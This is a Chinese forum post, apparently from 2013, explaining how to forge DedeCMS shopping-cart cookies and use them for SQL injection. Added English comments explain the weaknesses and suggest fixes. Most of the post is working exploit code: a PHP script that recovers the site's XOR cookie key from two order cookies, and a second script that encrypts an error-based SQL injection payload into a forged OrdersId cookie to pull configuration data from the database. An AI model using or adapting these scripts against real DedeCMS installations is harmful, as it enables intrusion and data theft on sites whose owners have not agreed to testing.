标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
作者:
admin
时间:
2013-2-13 23:58
标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
www.xxx.com/plus/search.php?keyword=
3 u, Q: m! [0 B3 Q, C/ J
在 include/shopcar.class.php中
. {/ s! d: \& H% S8 ^ F1 z
先看一下这个shopcar类是如何生成cookie的
% x, D2 A8 _* Y! D n: G
// include/shopcar.class.php, lines 239-250 as quoted in the post.
// Writes one shopping-cart cookie. Arrays are first flattened by enCode()
// (per the post: into an a=yy&b=cc style string), then everything is run
// through enCrypt(). Note what is absent: there is no MAC or signature, so
// the reader side (MemberShops::__construct below, via getCookie) has no
// way to tell a server-issued value from a client-forged one.
function saveCookie($key,$value)
{
    if(is_array($value))
    {
        $value = $this->enCrypt($this->enCode($value));
    }
    else
    {
        $value = $this->enCrypt($value);
    }
    // 36000 s lifetime, site-wide path; no HttpOnly/Secure flags are passed here.
    setcookie($key,$value,time()+36000,’/');
}
x C# u; l, \) {5 V
简单地说,$key 就是 cookie 的名称,$value 就是 cookie 的值;enCode 的作用是把数组转换成 a=yy&b=cc&d=know 这样的字符串,关键在于 enCrypt 函数。
) E$ ?. p7 h- J7 j2 A/ Q$ N+ G
// include/shopcar.class.php, lines 186-198 as quoted in the post.
// Inner layer of the cookie "encryption". Weaknesses visible in this body:
//  - rand() seeded from microtime() is not a CSPRNG, and rand(0, 32000)
//    leaves only ~32k possible per-cookie keys.
//  - each key byte is emitted in the clear, immediately followed by the XOR
//    of one plaintext byte with that same key byte, so this layer hides
//    nothing once the outer layer (setKey) is known.
//  - there is no integrity tag; XOR output is freely malleable.
// Fix direction: random_bytes() for any per-cookie randomness, an HMAC over
// the cookie body verified with hash_equals(), or keep the cart server-side
// behind an opaque random id.
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));
    $ctr = 0;
    $tmp = ”;
    for($i = 0; $i < strlen($txt); $i++)
    {
        // wrap the key index at 32, the length of an md5 hex digest
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        // key byte in the clear, then plaintext XOR that same key byte
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    // outer layer: XOR with a fixed, configuration-derived key, then base64
    return base64_encode($this->setKey($tmp));
}
% l' Y( X9 L/ }/ p4 p( x8 {% F! V: [
// include/shopcar.class.php, lines 213-225 as quoted in the post.
// Outer layer: repeating-key XOR with md5(strtolower($cfg_cookie_encode)),
// a value that is fixed for the whole installation. XOR is its own inverse,
// so one (input, output) pair for this function yields the 32-byte key by
// XORing the two together — which is exactly what the post's reStrCode()
// does. A constant XOR key is not encryption; use authenticated encryption,
// or at minimum an HMAC that the reader verifies with hash_equals().
function setKey($txt)
{
    global $cfg_cookie_encode;
    $encrypt_key = md5(strtolower($cfg_cookie_encode));
    $ctr = 0;
    $tmp = ”;
    for($i = 0; $i < strlen($txt); $i++)
    {
        // wrap the key index at 32 (md5 hex digest length)
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
) S/ c. O" e6 B1 b8 _ \3 F, _
enCrypt 的参数 $txt 是我们可知的,它的返回值就是 cookie 的值,这一点我们也是可知的。
5 m4 h' }% W: F# ?. |
再看 enCrypt 调用 setKey 时传入的参数 $tmp:它在某种意义上也是可知的,因为 $encrypt_key = md5(rand(0, 32000)) 只有 32000 种可能,于是可以枚举出 32000 种可能的 $tmp,进而推出 32000 种可能的 md5(strtolower($cfg_cookie_encode))。这里先补充说明目的:我们要推测出 setKey 中 $encrypt_key 的值,有了它才能任意构造购物车的 cookie。在推出的 32000 种 md5(strtolower($cfg_cookie_encode)) 中,简单过滤掉含有非字母数字字符的候选,就只剩下几百个可能的 key;然后重新下一次订单,再得到几百个候选 key,两者取交集,即得到最终的 key。
9 u* n! p; U9 ~; v
具体代码如下:
6 {5 x8 Z, X8 ]" I$ g% ~! k6 N% R
<?php
% C- ?) M; n g
// Inputs for the key-recovery script below: two cookies issued by the same
// installation for the same cart contents, plus the plaintext that enCode()
// would have produced for that cart (the post says this can be read off the
// order page).
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
: q, X+ ~" n* `0 @7 N/ t U; m( G- S ?5 q
// Given one observed cookie ($code, base64) and one candidate inner-layer
// string ($string), XOR the first 32 bytes together. Because setKey() is a
// plain XOR with a 32-byte key, the result is the value of
// md5(strtolower($cfg_cookie_encode)) implied by that candidate.
// Defender's takeaway: a single known input/output pair is enough to undo a
// fixed-key XOR; a MAC or authenticated encryption on the cookie removes the
// ability to forge values even when the key stream is recovered this way.
function reStrCode($code,$string)
{
    $code = base64_decode($code);
    $key = “”;
    for($i=0 ; $i<32 ; $i++)
    {
        $key .= $string[$i] ^ $code[$i];
    }
    return $key;
}
$ G/ h& w Q1 G( F0 _
// Enumerates the inner keys enCrypt() can produce (md5($j) for $j < 32000),
// rebuilds the inner-layer string for each, derives the implied outer key
// with reStrCode(), and keeps the candidates that look like an md5 hex
// digest ([a-z0-9]). Returns the surviving candidates; the post then
// intersects the lists obtained from two cookies.
// The only reason this enumeration is feasible is the tiny rand(0, 32000)
// key space in the quoted enCrypt(); a CSPRNG-sized nonce would not be
// brute-forceable.
function getKeys($cookie,$plantxt)
{
    $tmp = $cookie;
    $results = array();
    for($j=0 ; $j < 32000; $j++)
    {
        $txt = $plantxt;
        $ctr = 0;
        $tmp = ”;
        // candidate inner key for this iteration
        $encrypt_key = md5($j);
        // same interleaving as the quoted enCrypt(): key byte, then XOR byte
        for($i =0; $i < strlen($txt); $i ++)
        {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
        }
        $string = $tmp;
        $code = $cookie;
        $result = reStrCode($code,$string);
        // keep only candidates shaped like a hex digest
        if(eregi(‘^[a-z0-9]+$’,$result))
        {
            echo $result.”\n”;
            $results[] = $result;
        }
    }
    return $results;
}
. J* L% o0 N. Q' }* l' `* w9 y6 _) J
// Candidate outer keys from each cookie, then their intersection: a value
// common to both lists is the installation's md5(strtolower($cfg_cookie_encode)).
$results1 = getKeys($cookie1,$plantxt);
$results2 = getKeys($cookie2,$plantxt);
print “\n——————–real key————————–\n”;
foreach($results1 as $test1)
{
    foreach($results2 as $test2)
    {
        if($test1 == $test2)
        {
            echo $test1.”\n”;
        }
    }
}
$ x' s- k; b% N0 f4 P
?>
6 |5 ~& ^# E3 P6 P4 m, I* G) b Q& ` p) ?
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie。
. O+ D) |" C: u9 w
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
0 x& q" D1 N ]! w0 ?% w
然后推算出md5(strtolower($cfg_cookie_encode))
8 d1 W, _! _6 m" o9 i
得到这个key之后,我们就可以构造任意购物车的cookie
: W. B+ f2 }" n! T
接着看
/ R% ~. p, {: u% l7 r G
20 class MemberShops
2 B# s* j9 k6 z' B4 _
21 {
5 t* J7 ^ Y+ {/ b7 L" o. |& }. r
22 var $OrdersId;
* i% M6 A, d" X. G
23 var $productsId;
% G2 G; R# a1 x0 w
24
/ V) k7 {1 J( [
// include/shopcar.class.php, lines 25-32 as quoted (class MemberShops, whose
// declaration starts at line 20 and continues past this excerpt).
// The order id is taken from a client-supplied cookie and, when non-empty,
// used as-is; getCookie() presumably undoes enCrypt(), but nothing here — and
// nothing in the cookie format quoted above — authenticates the value. It
// later reaches an SQL string in plus/carbuyaction.php (quoted below), so the
// cookie is the injection vector. Hardening: sign the cookie (HMAC, verified
// with hash_equals()) and, independently, bind $OrdersId as a query parameter
// rather than interpolating it.
function __construct()
{
    $this->OrdersId = $this->getCookie(“OrdersId”);
    // an empty value gets a freshly generated order id instead
    if(empty($this->OrdersId))
    {
        $this->OrdersId = $this->MakeOrders();
    }
}
4 _' N& q# ?5 K. p1 V+ n
发现 OrdersId 是从 cookie 里面获取的
3 y: O, \3 I) \ C% R2 N* Q
然后
8 B; J+ w( I3 E6 n( p
/plus/carbuyaction.php中的
9 J# f" t X. X
// plus/carbuyaction.php, lines 29, 39 and 173 as quoted (non-contiguous excerpt).
$cart = new MemberShops();
$OrdersId = $cart->OrdersId; // the order id recorded this time
……
// $OrdersId is the cookie-derived value from MemberShops::__construct, spliced
// straight into the SQL text. Quoting does not help once the attacker controls
// the bytes; this needs a bound parameter (prepared statement), and the
// application should additionally validate the id's expected shape before it
// gets this far.
$rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
3 N5 T3 p6 X) ^% B
接着我们就可以注入了
' Z' ^7 a* q: c* K( |. ?
通过利用下面代码生成cookie:
3 d/ L- S! x& h) _& a% C7 `
<?php
3 u9 G# C: I/ s1 }+ M% D
// Inputs of the cookie-forging script: the value that will be read back as
// OrdersId (here an injection string aimed at the unparameterised oid lookup
// in plus/carbuyaction.php quoted above) and the installation's recovered
// outer key. Binding `oid` as a prepared-statement parameter and putting a
// MAC on the cookie each independently defeat this.
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
y/ p& {! X) v n
// Stand-alone copy of shopcar.class.php setKey(), taking the recovered key
// from the global $encrypt_key instead of deriving it from
// $cfg_cookie_encode. Same repeating-key XOR, so the same function both
// encrypts and decrypts.
function setKey($txt)
{
    global $encrypt_key;
    $ctr = 0;
    $tmp = ”;
    for($i = 0; $i < strlen($txt); $i++)
    {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
# i- D: \; ~4 ^8 p3 c
// Copy of the quoted enCrypt(), calling the local setKey(). Which of the
// ~32k inner keys is picked does not matter to the recipient: the loop
// writes each key byte into the output right next to the XOR byte it
// produced, so the inner key travels inside the cookie itself.
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));
    $ctr = 0;
    $tmp = ”;
    for($i = 0; $i < strlen($txt); $i++)
    {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode(setKey($tmp));
}
/ S: B! U9 L" J2 y5 o* b
// Re-run enCrypt() until the base64 result contains no '+' — presumably
// because '+' does not survive cookie/URL transport unchanged (the post does
// not say). Each iteration draws a fresh inner key, which is why the output
// differs between runs.
for($dest =0;$dest = enCrypt($txt);)
{
    if(!strpos($dest,’+'))
    {
        break;
    }
}
echo $dest.”\n”;
1 `3 @: E2 ?' u
?>
; }( i7 i( H7 E9 a8 @6 Q
: \" Z# a2 U, O+ W' d1 h3 M